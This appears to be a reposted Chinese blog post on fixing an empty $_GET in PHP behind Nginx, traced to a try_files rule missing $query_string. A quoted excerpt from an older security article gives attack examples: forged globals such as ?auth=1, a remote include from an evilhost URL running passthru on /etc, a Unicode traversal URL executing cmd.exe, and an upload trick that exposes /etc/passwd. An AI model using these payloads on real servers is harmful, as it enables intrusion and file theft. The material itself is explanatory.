PHP发生无法使用$_GET

习惯解决问题要从根源查起的我决定由表及里,首先在入口获取。

1.尝试POST方式请求,利用$_POST接收。成功。

  尝试GET方式请求,利用$_GET接收,为空。定位$_GET

2.尝试用$_SERVER取到信息。继续用GET方式发起请求。

发现$_SERVER的部分键为空。由于‘query_string'和get方法参数紧密相关,先去检查,发现该字段为空值。进而排查导致无参数的原因。

补充:对于为啥用$_SERVER检查定位的原因:http://blog.csdn.net/wjciayf/article/details/52328601

了解了每个键的作用知道:

$_SERVER["QUERY_STRING"]  获取查询 语句,实例中可知,获取的是?后面的值
$_SERVER["REQUEST_URI"]   获取 http://localhost 后面的值,包括/
$_SERVER["SCRIPT_NAME"]   获取当前脚本的路径,如:index.php
$_SERVER["PHP_SELF"]      当前正在执行脚本的文件名

当这些参数都没有的时候必然是传到PHP之前就错了哇~补充结束!

 

3.查询网络资料后,对于原因定位在两个方向---PHP配置和Nginx配置。

首先检查了我比较熟悉的部分:php.ini

(1)variables_order='EGPCS'??

首先排除这个因素,这里在php.ini有明确说明,这是默认值,在开发环境或者线上环境可以或者说应该是GPCD

(2)able_post_reading;register_global;cgi.fix_pathinfo等

这些比较少修改的参数进行一一确认。

        a.)php.ini 中配置 enable_post_data_reading 为 On, 这样才会自动将 POST 数据填入 $_POST 数组中。这个一般默认是On

        b.)register_global=off 这是一个默认配置。一般不去开启,会存在安全隐患。比如session/GET/POST里没有某一变量,可以用GET/POST方法模拟一个。
就像家里住着一位来历不明的客人一样。
为了避免这样的事情,就得不停地用session_is_registered()检测!反而会增大系统开销


-----  摘点东西  --------
[全局变量] 
PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型也不需要指定,它们会根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。很显然,这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量,毕竟,当它们第一次创建时,他们是空的。 

很显然,基于PHP的应用程序的主函数一般都是接受用户的输入(主要是表单变量,上载文件和Cookie等),然后对输入数据进行处理,然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易,实际上PHP是把这些输入数据看作全局变量来处理的。 

例如: 

<FORM METHOD="GET" ACTION="test.php"> 
<INPUT TYPE="TEXT" NAME="hello"> 
<INPUT TYPE="SUBMIT"> 
</FORM> 

很显然,这会显示一个文本框和提交按钮。当用户点击提交按钮时,“test.php”会处理用户的输入,当“test.php”运行时,“$hello”会包含用户在文本框输入的数据。从这里我们应该看出,攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用“test.php”,而是直接在浏览器地址栏输入http://server/test.php?hello=hi&setup=no,那么,不止是“$hello”被创建,“$setup”也被创建了。 

译者注:这两种方法也就是我们通常说的“POST”和“GET”方法。 
下面的用户认证代码暴露了PHP的全局变量所导致的安全问题: 

<?php 
 if ($pass == "hello") 
  $auth = 1; 
 ... 
 if ($auth == 1) 
  echo "some important information"; 
?> 

上面的代码首先检查用户的密码是否为“hello”,如果匹配的话,设置“$auth”为“1”,即通过认证。之后如果“$suth”为“1”的话,就会显示一些重要信息。 

表面看起来是正确的,而且我们中有相当一部分人是这样做的,但是这段代码犯了想当然的错误,它假定“$auth”在没有设置值的时候是空的,却没有想到攻击者可以创建任何全局变量并赋值,通过类似“http://server/test.php?auth=1”的方法,我们完全可以欺骗这段代码,使它相信我们是已经认证过的。 

因此,为了提高PHP程序的安全性,我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话,这可是一项非常艰巨的任务。 

一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量,这依赖于我们的提交方式(GET或POST)。当PHP配置为打开“track_vars”选项的话(这是缺省值),用户提交的变量就可以在全局变量和上面提到的数组中获得。 

但是值得说明的是,PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量,HTTP_POST_VARS数组用于处理POST方式提交的变量,HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量,而对于HTTP_POST_FILES数组(比较新的PHP才提供),则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中,因此一个安全的PHP程序应该检查这四个数组。 

[远程文件] 
PHP是一种具有丰富特性的语言,提供了大量的函数,使编程者实现某个功能很容易。但是从安全的角度来看,功能越多,要保证它的安全性就越难,远程文件就是说明这个问题的一个很好的例子: 

<?php 
 if (!($fd = fopen("$filename", "r")) 
  echo("Could not open file: $filename<BR>\n"); 
?> 

上面的脚本试图打开文件“$filename”,如果失败就显示错误信息。很明显,如果我们能够指定“$filename”的话,就能利用这个脚本浏览系统中的任何文件。但是,这个脚本还存在一个不太明显的特性,那就是它可以从任何其它WEB或FTP站点读取文件。实际上,PHP的大多数文件处理函数对远程文件的处理是透明的。 

例如: 
如果指定“$filename”为“http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir” 
则上面的代码实际上是利用主机target上的unicode漏洞,执行了dir命令。 

这使得支持远程文件的include(),require(),include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容,并且把它们按照PHP代码解释,主要是用在库文件上。 

例如: 
<?php 
 include($libdir . "/languages.php"); 
?> 

上例中“$libdir”一般是一个在执行代码前已经设置好的路径,如果攻击者能够使得“$libdir”没有被设置的话,那么他就可以改变这个路径。但是攻击者并不能做任何事情,因为他们只能在他们指定的路径中访问文件languages.php(perl中的“Poison null byte”攻击对PHP没有作用)。但是由于有了对远程文件的支持,攻击者就可以做任何事情。例如,攻击者可以在某台服务器上放一个文件languages.php,包含如下内容: 

<?php 
 passthru("/bin/ls /etc"); 
?> 

然后把“$libdir”设置为“http://<evilhost>/”,这样我们就可以在目标主机上执行上面的攻击代码,“/etc”目录的内容作为结果返回到客户的浏览器中。 

需要注意的是,攻击服务器(也就是evilhost)应该不能执行PHP代码,否则攻击代码会在攻击服务器,而不是目标服务器执行,如果你想了解具体的技术细节,请参考:http://www.securereality.com.au/sradv00006.txt 

[文件上载] 
PHP自动支持基于RFC 1867的文件上载,我们看下面的例子: 

<FORM METHOD="POST" ENCTYPE="multipart/form-data"> 
<INPUT TYPE="FILE" NAME="hello"> 
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240"> 
<INPUT TYPE="SUBMIT"> 
</FORM> 

上面的代码让用户从本地机器选择一个文件,当点击提交后,文件就会被上载到服务器。这显然是很有用的功能,但是PHP的响应方式使这项功能变的不安全。当PHP第一次接到这种请求,甚至在它开始解析被调用的PHP代码之前,它会先接受远程用户的文件,检查文件的长度是否超过“$MAX_FILE_SIZE variable”定义的值,如果通过这些测试的话,文件就会被存在本地的一个临时目录中。 

因此,攻击者可以发送任意文件给运行PHP的主机,在PHP程序还没有决定是否接受文件上载时,文件已经被存在服务器上了。 

这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。 

让我们考虑一下处理文件上载的PHP程序,正如我们上面说的,文件被接收并且存在服务器上(位置是在配置文件中指定的,一般是/tmp),扩展名一般是随机的,类似“phpxXuoXG”的形式。PHP程序需要上载文件的信息以便处理它,这可以通过两种方式,一种方式是在PHP 3中已经使用的,另一种是在我们对以前的方法提出安全公告后引入的。 

但是,我们可以肯定的说,问题还是存在的,大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件,比如说上面的例子: 

$hello = Filename on local machine (e.g "/tmp/phpxXuoXG") 
$hello_size = Size in bytes of file (e.g 1024) 
$hello_name = The original name of the file on the remote system (e.g "c:\\temp\\hello.txt") 
$hello_type = Mime type of uploaded file (e.g "text/plain") 

然后PHP程序开始处理根据“$hello”指定的文件,问题在于“$hello”不一定是一个PHP设置的变量,任何远程用户都可以指定它。如果我们使用下面的方式: 

http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt 

就导致了下面的PHP全局变量(当然POST方式也可以(甚至是Cookie)): 

$hello = "/etc/passwd" 
$hello_size = 10240 
$hello_type = "text/plain" 
$hello_name = "hello.txt" 

上面的表单数据正好满足了PHP程序所期望的变量,但是这时PHP程序不再处理上载的文件,而是处理“/etc/passwd”(通常会导致内容暴露)。这种攻击可以用于暴露任何敏感文件的内容。 

我在前面已经说了,件新版本的PHP使用HTTP_POST_FILES[]来决定上载文,同时也提供了很多函数来解决这个问题,例如有一个函数用来判断某个文件是不是实际上载的文件。这些函数很好的解决了这个问题,但是实际上肯定有很多PHP程序仍然使用旧的方法,很容易受到这种攻击。 

作为文件上载的攻击方法的一个变种,我们看一下下面的一段代码: 

<?php 
 if (file_exists($theme)) // Checks the file exists on the local system (no remote files) 
include("$theme"); 
?> 

如果攻击者可以控制“$theme”的话,很显然它可以利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令,但是他无法使用远程文件,因此,他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的,但是文件上载帮了我们这个忙,如果攻击者先在本地机器上创建一个包含PHP代码的文件,然后创建一个包含名为“theme”的文件域的表单,最后用这个表单通过文件上载把创建的包含PHP代码的文件提交给上面的代码,PHP就会把攻击者提交的文件保存起来,并把“$theme”的值设置为攻击者提交的文件,这样file_exists()函数会检查通过,攻击者的代码也将执行。 

获得执行任意指令的能力之后,攻击者显然想提升权限或者是扩大战果,而这又需要一些服务器上没有的工具集,而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具,把她们存在服务器上,然后利用他们执行指令的能力,使用chmod()改变文件的权限,然后执行。例如:攻击者可以绕过防火墙或IDS上载一个本地root攻击程序,然后执行,这样就获得了root权限。 

这一段是无意中看到的,但是忽然觉得还是有很多值得深思的细节。。。。

------    回到主题  -----------

   c.)cgi.fix_pathinfo    这也是一个安全问题,如果这个参数直接设置为0。这个问题只存在于 Nginx 服务器中,Apache和IIS都不会有这个问题。不建议关闭,很多代码都会依赖这个功能,关了基本上都会报错。但是,当 cgi.fix_pathinfo 开启时,PATH_TRANSLATED 有可能是 NULL,从而引起内存异常,造成 php-fpm crash,所以 php-fpm 关闭这个选项。

对于安全隐患的因果描述:http://blog.csdn.net/neubuffer/article/details/16901023

 

于是需要考虑在保持 cgi.fix_pathinfo =1时如何避免漏洞。

网上搜索到的解决办法挺多比如 加上正则判断存在漏判问题,所以尝试使用其他方式解决,用try_files替代if判断文件

try_files $fastcgi_script_name =404;

 debug日志中会有类似判断:*308 trying to use file: "/robots.txt/a.php" "/var/htdoc/mychery.net/robots.txt/a.php"

 

但是要注意:try_files $request_filename =404;  #无效的用法!

debug日志如下,判断路径重复拼接是错误的

*339 trying to use file: "/var/htdoc/mychery.net/robots.txt/a.php" "/var/htdoc/mychery.net/var/htdoc/mychery.net/robots.txt/a.php"

 

 

网络上描述最多的是:

可以把正确的判断命令加入到fastcgi.conf中:

fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;

fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;

fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;

fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;

# PHP only, required if PHP was built with --enable-force-cgi-redirect
fastcgi_param REDIRECT_STATUS 200;

try_files $fastcgi_script_name =404;

 

然后在location中引用它:

location ~ \.php$ {
    fastcgi_pass unix:/tmp/phpfpm/php-fpm.sock;
    include   fastcgi.conf;
}

 

由于这一部分对于我这个新手玩家实在吃力,于是直接检查了ngnix配置进行检查,对于这一部分代买进行对比,和上段相仿。继而继续检查Nginx其他配置,这里最有可能出问题的就是重定向位置对参数解析,果然。。。坑出现了。原因是用的 try_files,在try_files 中的uri 后面参数没写对引起的!

try_files $uri $uri/ /index.php;
改为

try_files $uri $uri/ /index.php?$query_string;

解释下:
对于$uri :

1)如果 存在文件 /Vhost/$http_host/$uri ,访问的是该文件
2)否则 如果 $uri 不是以 “/” 结尾 ,跳转到 $uri/
3)否则 如果 $uri 以 “/” 结尾 且 存在 /Cache/$http_host/$uri/index.html ,访问的是该文件
 

 

所以如果需要解析参数的时候需要加上$query_string.

参考下:http://www.weixinnu.com/tag/article/1787131697

 

 

 

转载于:https://my.oschina.net/jlong/blog/1594489

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值